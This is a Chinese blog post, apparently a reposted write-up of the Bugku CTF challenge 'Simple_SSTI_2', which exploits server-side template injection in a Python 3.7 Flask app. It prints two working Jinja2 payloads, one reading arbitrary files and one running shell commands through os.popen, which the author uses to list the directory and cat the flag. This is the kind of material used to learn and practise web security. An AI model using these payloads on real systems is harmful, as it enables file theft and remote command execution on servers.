+关注
已关注

分类  

暂无分类

标签  

暂无标签

日期归档  

2020-04(22)

2020-05(34)

2020-06(42)

2020-07(32)

2020-08(30)

bugku Simple_SSTI_2 wp

发布于2021-03-13 12:24     阅读(1286)     评论(0)     点赞(6)     收藏(3)


0

1

2

3

4

5

6

7

8

题目是 Simple SSTI 说明是模板注入
在这里插入图片描述
传参测试
在这里插入图片描述
2*4被执行了
先传点错误语句看看是什么模板
在这里插入图片描述
得到信息是python的flask模板注入题,而且是python3.7
网上查找一些payload
文件读写

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('在这里输文件名', 'r').read() }}{% endif %}{% endfor %}

命令执行

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{% endif %}{% endfor %}

先执行ls看看
在这里插入图片描述
看到flag就在当前目录了
执行cat flag就能拿到flag
在这里插入图片描述
或者用读文件的payload
在这里插入图片描述
也可以拿到flag

0

1

2

3

4

5

6

7

8



所属网站分类: 技术文章 > 博客

作者:来一碗蛋炒饭

链接: https://www.pythonheidong.com/blog/article/889398/b6cd74d2b45fc492f8b1/

来源: python黑洞网

任何形式的转载都请注明出处,如有侵权 一经发现 必将追究其法律责任

6 0
收藏该文
已收藏

评论内容:(最多支持255个字符)